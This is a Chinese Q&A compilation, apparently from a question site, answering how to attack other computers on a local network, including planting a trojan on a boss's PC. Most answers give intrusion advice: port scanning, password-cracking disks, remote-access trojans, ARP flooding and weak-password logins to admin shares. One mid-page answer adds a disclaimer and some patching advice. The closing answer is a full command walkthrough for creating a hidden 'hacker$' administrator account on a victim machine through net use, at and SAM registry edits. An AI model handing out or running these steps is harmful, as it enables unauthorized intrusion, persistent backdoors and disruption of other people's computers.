如何攻击局域网其它电脑,想在老板的电脑种下木马?
局域网入侵是很简单的,当然最近的方法我是有几年 没玩过了,首先你要知道你们老板电脑的局域网ip地址,我可以推荐几个方法给你,第一个就是直接telnet进去,条件是你知道你们老板开了什么可以连接的端口,当然这个好解决用软件扫描就是了,记得以前的软件叫做明小子,专门给菜鸟玩的。。。
第二个,拿一张密码破解盘(如果他有密码的话)当他不在的时候直接破掉密码 运行木马就好 了。两分钟搞定。
第三个,就是拿软件来堆,扫ip软件,扫端口软件,扫弱口令软件,一个字典软件,一个远程连接的客户端类似灰鸽子的现在应该很多种,别问我具体软件叫什么,好多年没玩过了,不知道现在都 用什么。
以前可能还有其他方法,不过随着系统的完善,很多种漏洞都不能用了。。。。就这样吧,不过你真的确定知道木马是什么???有什么作用? 看你的问题就知道,你不太懂,网络上很多木马都是别人捆绑完以后放上去的,你在下载木马的同时可能就中了别人的木马,这样做不安全的。。。
给你个建议,想玩死内网的电脑很简单,你只要知道他IP,下载一款arp攻击软件,进行攻击就行了,只要你一直在攻击他就没办法上网,本机速度也会拖慢很多,这样比较安全。
如何在局域网里攻击别人电脑?急求!
用灰鸽子也可以,不过也要学上一段时间,最简单的方法是,如果是同一局域网的话,知道到他的ip,然后在运行里面打上\\ip\c$,需要打用户名和密码,用户名打administrator,除非他没设置密码,你可以直接进入,然后可以任意改他c盘里面的东西,甚至直接放木马进去
如何入侵局域网内同一工作组的电脑?
声明:非法入侵他人局域网是犯罪行为,应该停止这种行为,但本人此次回答是希望能起到防范入侵目的
要想入侵有2中方法:
第一种是请进来
所谓的请进来是指通过网络钓鱼手段,让你的电脑点击了不该点击的连接,使得你的访问目的和ip被暴露,给对方留下了痕迹。同样也可以通过带有感染病毒的文本,程序等植入对方的电脑中,主动邀请你访问对方电脑。这种携带都是对方向你提出的,也就是他请你进入对方电脑的。
第二种是摸进去
所谓摸进去是指你不知道对方的任何信息,通过ip扫描,一般内网ip都是192.168.*.*来分配的,通过ip遍历扫描,找到在线的电脑,通过漏洞扫描就可以轻松的攻破对方的电脑了。
补充说明:
如果对方打好补丁或者及时更新相关补丁是无法攻入的,另外经常要更换密码口令,不要使用弱口令,平时关闭远程桌面功能也是可以减少被攻入的概率。更重要的是及时备份数据,系统经常更新是硬道理。
如果是BT问题实际有个现实问题你要面对,也就是BT软件本身也拉自己电脑资源,本人做过试验,电脑开着啥也不做,一天被拉走10G流量,实际可以理解,BT就是靠P2P技术实现的,因此,在不需要下载的情况完全退出BT软件(BT下载,迅雷,暴风等)。如果是网络太卡的话,有可能对方使用了ERP攻击,做好ERP防范攻击措施。
我怎么去攻击我局域网中的电脑呢,用什么软件比较好??
使用DameWare NT Utilities这个软件就行,你可以在他的电脑上做任何事情,开玩笑可以,可千万别胡来呀
谁知道怎样在局域网攻击别人电脑,或者有什么好的软件介绍个!
我可以告诉你一个办法不过需要对象的用户名和口令,还要知道他的IP
地址,只要你知道拿到账号和密码半个小时就可以搞定,以后你就有一个自己的隐藏管理员账户,随便进入他的电脑。
在这里将用at的命令,因为用at产生的计划任务是以系统身份运行的,所以也用不到psu.exe程序。为了能够使用at命令,肉鸡必须开有schedule的服务,如果没有开启,可用流光里带的工具netsvc.exe或sc.exe来远程启动,当然其方法也可以,只要能启动schedule服务就行。
对于命令行方式,你可以采用各种连接方式,如用SQLexec连接MSSQL的1433端口,也可以用telnet服务,只要以你能得到一个cmdshell,并且有运行at命令的权限就可以。
1.这里先假设他的用户名为administrator,密码为12345678,现在我们开始在命令行下远程为它建立隐藏的超级用户。(假设主机是局域网内的一台主机,ip地址为13.50.97.238,。)
2.先与他建立连接:
net
use
\\13.50.97.238\ipc$
"12345678"
/user:"Administrator”
3.用at命令在他的电脑建立一个用户(如果at服务没有启动,可用netsvc.exe或sc.exe来远程启动):
at
\\13.50.97.238
12:51
c:\windows\system32\net.exe
user
hacker$
1234
/add
建立这个加有$符的用户名,是因为加有$符后,命令行下用net
user将不显示这个用户,但在帐户管理器却能看到这个用户。
4.同样用at命令导出HKEY_LOCAL_MACHINE\sam\sam\Domains\account\users下键值:
at
\\13.50.97.238
12:55
c:\windows\regedit.exe
/e
hacker.reg
HKEY_LOCAL_MACHINE\SAM\SAM\Domains\account\users
/e
是regedit.exe的参数,在这里HKEY_LOCAL_MACHINE\SAM\SAM\Domains\account\users这个键的一定不要以“\“结尾。必要的情况下可以用引号将"c:\windows\regedit.exe
/e
hacker.reg
HKEY_LOCAL_MACHINE\SAM\SAM\Domains\account\users"引起来。
5.将他的电脑上的hacker.reg下载到本机上用记事本打开进行编辑命令为:
Copy
\\13.50.97.238\admin$\system32\hacker.reg
c:\hacker.reg
6.再将编辑好的hacker.reg拷回他的电脑上
copy
c:\hacker.reg
\\13.50.97.238\admin$\system32\hacker1.reg
7.查看他的电脑时间:net
time
\\13.50.97.238然后用at命令将用户hacker$删除:
at
\\13.50.97.238
13:40
net
user
hacker$
/del
8.验证hacker$是否删除:net
use
\\13.50.97.238
/del
断开与他的电脑连接。
再用net
use
\\13.50.97.238\ipc$
"1234"
/user:"hacker$"
用帐户hacker$与他电脑连接,不能连接说明已删除。
9.再与他电脑建立连接:
net
use
\\13.50.97.238\ipc$
"12345678"
/user:"administrator"
再取得他的时间,用at命令将拷回他的hacker1.reg导入他的注册表:
at
\\13.50.97.238
13:41
c:\windows\regedit.exe
/s
hacker1.reg
regedit.exe的参数/s是指安静模式。
10.再验证hacker$是否已建立,方法同上面验证hacker$是否被删除一样。
11.再验证用户hacker$是否有读、写、删除的权限,如果不放心,你还可验证是否能建立其它帐户。
12.通过步骤11可以断定用户hacker$具有超级用户权限,因为最初我用at命令建立它的时候是一个普通用户,而现在却具有远程读、写、删除的权限。
OK
以后你可以随意拿你的账号进入他电脑里游荡了~~~~~~~~~~~~~~~